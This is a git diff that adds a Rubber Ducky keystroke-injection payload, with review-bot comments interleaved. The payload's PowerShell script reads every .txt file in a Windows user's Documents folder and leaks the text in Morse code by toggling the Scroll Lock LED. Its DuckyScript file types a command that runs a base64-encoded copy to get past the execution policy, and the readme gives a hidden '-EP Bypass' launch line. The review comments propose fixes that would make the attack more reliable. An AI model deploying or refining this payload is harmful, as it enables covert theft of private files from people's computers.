diff --git a/payloads/library/exfiltration/Win_PoSH_MorseCode/MorseCodeFileExfiltration.ps1 b/payloads/library/exfiltration/Win_PoSH_MorseCode/MorseCodeFileExfiltration.ps1
new file mode 100644
index 0000000..3af4309
--- /dev/null
+++ b/payloads/library/exfiltration/Win_PoSH_MorseCode/MorseCodeFileExfiltration.ps1
@@ -0,0 +1,32 @@
+$o = New-Object -com wscript.shell;
+$h = @{ "1"="39999"; "2"="33999"; "3"="33399"; "4"="33339"; "5"="33333"; "6"="93333"; "7"="99333"; "8"="99933"; "9"="99993"; "0"="99999"; "A"="39"; "B"="9333"; "C"="9393"; "D"="933"; "E"="3"; "F"="3393"; "G"="993"; "H"="3333"; "I"="33"; "J"="3999"; "K"="939"; "L"="3933"; "M"="99"; "N"="93"; "O"="999"; "P"="3993"; "Q"="9939"; "R"="393"; "S"="333"; "T"="9"; "U"="339"; "V"="3339"; "W"="399"; "X"="9339"; "Y"="9399"; "Z"="9933" };
+$l = '{SCROLLLOCK}';
+function flashy($t){
+    $o.SendKeys($l);
+    sleep -m ([int]$t);
+    $o.SendKeys($l);
+    #[console]::beep(600,([int]$t));
+    sleep -m 300;
+}
+gci ([Environment]::GetFolderPath('MyDocuments')) -file -r *.txt | % { gc($_.FullName).ToUpper()} | % {$_[0..($_.length)]} | % {
+    $v = $h[[string]$_];
+    if ($v)
+    {
+        $v| % {$_[0..($_.length)]} | % {
+            flashy((([int]([string]$_))*100));
+        }
+    }
+    elseif ((!$v) -and !(([int]$_) -eq 32))
+    {
+        flashy(2700);
+        $v = ([string]([int]$_));
+        $v| % {$_[0..($_.length)]} | % {
+            $h[[string]$_] | % {$_[0..($_.length)]} | % {
+                flashy((([int]([string]$_))*100));
+            }
+        }
+    }else{
+        sleep -m 1200;
+    }
+    sleep -m 600;
+ }
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Win_PoSH_MorseCode/b.txt b/payloads/library/exfiltration/Win_PoSH_MorseCode/b.txt
new file mode 100644
index 0000000..4f14daf
--- /dev/null
+++ b/payloads/library/exfiltration/Win_PoSH_MorseCode/b.txt
@@ -0,0 +1 @@
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
\ No newline at end of file
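Review bot: The character slice `$_[0..($_.length)]` on the `gci` line, and the same slice in the three nested pipelines below it, uses `$_.length` as the upper bound, so its last index is one past the final character; if that out-of-range index yields a trailing `$null` (as single out-of-range indexing does), the outer loop sends it into the `elseif` branch, where `[int]$null` is 0 rather than 32, and a spurious `flashy(2700)` plus the code for "0" follows every line of every file. `$_.ToCharArray()` enumerates exactly the characters and removes the ambiguity in all four places. The timing constants are also undocumented; a header comment along the lines of `# digit*100 ms between the two SCROLLLOCK toggles: 3 = dot (300 ms), 9 = dash (900 ms); 2700 ms marks a character outside the table, followed by its ordinal; 1200 ms for a space; 600 ms after each character` would let a reader check the table against the script. The commented-out `#[console]::beep(600,([int]$t));` line is dead code and should either be removed or explained.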
diff --git a/payloads/library/exfiltration/Win_PoSH_MorseCode/payload.txt b/payloads/library/exfiltration/Win_PoSH_MorseCode/payload.txt
new file mode 100644
index 0000000..b25aaa7
--- /dev/null
+++ b/payloads/library/exfiltration/Win_PoSH_MorseCode/payload.txt
@@ -0,0 +1,60 @@
+REM Title: Morse Code File Exfiltration
+REM Description: Reads all txt files in myDocs and Flashes the Scrolllock on and off to represent morse code
+REM Author: Cribbit
+REM Version: 1.2
+REM Category: Exfiltration
+REM Target: Windows (Powershell 5.1+)
+REM Attackmodes: HID & STORAGE
+REM Note: For characters outside the Morse code 0..9 A..Z it now flash one long pulse then the chars ordinal value i.e. (@ = 64 = -.... ....-)
+ATTACKMODE HID STORAGE
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.0
+    
+    REM Windows fully passive OS Detection and passive Detect Ready
+    REM Includes its own passive detect ready. Does not require
+    REM additional extensions
+    
+    REM USAGE:
+    REM Extension runs inline (here)
+    REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+    REM boot delay
+    REM $_OS will be set to WINDOWS or NOT_WINDOWS
+    
+    REM CONFIGURATION:
+    DEFINE MAX_WAIT 150
+    DEFINE CHECK_INTERVAL 20
+    DEFINE WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE NOT_WINDOWS 7
+    
+    VAR $MAX_TRIES = MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    ELSE
+        $_OS = NOT_WINDOWS
+    END_IF
+    
+    REM EXAMPLE USAGE AFTER EXTENSION
+    REM IF ($_OS == WINDOWS) THEN
+    REM STRING HELLO WINDOWS!
+    REM ELSE
+    REM STRING HELLO WORLD!
+    REM END_IF
+END_EXTENSION
+
+
+IF ($_OS == WINDOWS)
+    LED_GREEN
+    REM Give explorer time to show
+    DELAY 2000
+    GUI r
+    DELAY 200
+    STRINGLN powershell .(powershell.exe -encodedCommand (gc((gwmi win32_volume -f 'label=''DUCKY''').Name+'\b.txt')))
+ELSE
+    LED_RED
+END_IF
+
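Review bot: The top-level `IF ($_OS == WINDOWS)` near the end of the hunk omits the `THEN` that the extension's own `IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN` (and the commented example just above `END_EXTENSION`) uses; if the DuckyScript compiler requires `THEN` the payload will not build, and either way the two forms should agree — `IF ($_OS == WINDOWS) THEN`. The `STRINGLN powershell .(powershell.exe -encodedCommand (gc(...'\b.txt')))` line executes an opaque encoded blob and nothing in this file says where it comes from; a `REM b.txt is the base64-encoded form of MorseCodeFileExfiltration.ps1 in this folder; regenerate it whenever that script changes` comment above the line would let a reviewer verify the blob against its readable source, which the readme asks users to do. The `REM Note:` header sentence `it now flash one long pulse then the chars ordinal value` would read better as `it now flashes one long pulse followed by the character's ordinal value`.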
diff --git a/payloads/library/exfiltration/Win_PoSH_MorseCode/readme.md b/payloads/library/exfiltration/Win_PoSH_MorseCode/readme.md
new file mode 100644
index 0000000..d295985
--- /dev/null
+++ b/payloads/library/exfiltration/Win_PoSH_MorseCode/readme.md
@@ -0,0 +1,26 @@
+# :flashlight: Morse Code File Exfiltration
+* Author: Cribbit
+* Version: 1.2
+* Target: Windows (Powershell 5.1+)
+* Category: Exfiltration
+* Attackmode: HID & Storage
+
+## :book: Description
+Reads all txt files in "my documents" and flashes the scroll lock on and off to represent Morse code of the English alphanumeric characters (0..9 A..Z)
+For characters outside the Morse code 0..9 A..Z it now flash one long pulse then the chars ordinal value i.e. (@ = 64 = -.... ....-)
+
+## :musical_note: Note
+This is not a very useful payload with limitation of morse code but I thought it was fun to create.
+
+The payload uses a base64 encode version of the payload (b.txt) to get round the Script Execution Policy. There is a non-base64 version in the file (MorseCodeFileExfiltration.ps1) so you can see what it is doing.
+
+Please check the encoded payload before execution, to make sure it has not been replaced with something more malicious.
+
+If you do not want to use the base64 version you could change the payload to:
+`RUN WIN "powerShell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''DUCKY''').Name+'payloads\\$SWITCH_POSITION\MorseCodeFileExfiltration.ps1')"`
+
+
+## :page_facing_up: Change Log
+| Version | Changes |
+| ------- | ------------------------------|
+| 1.2 | Ported from BashBunny Repo |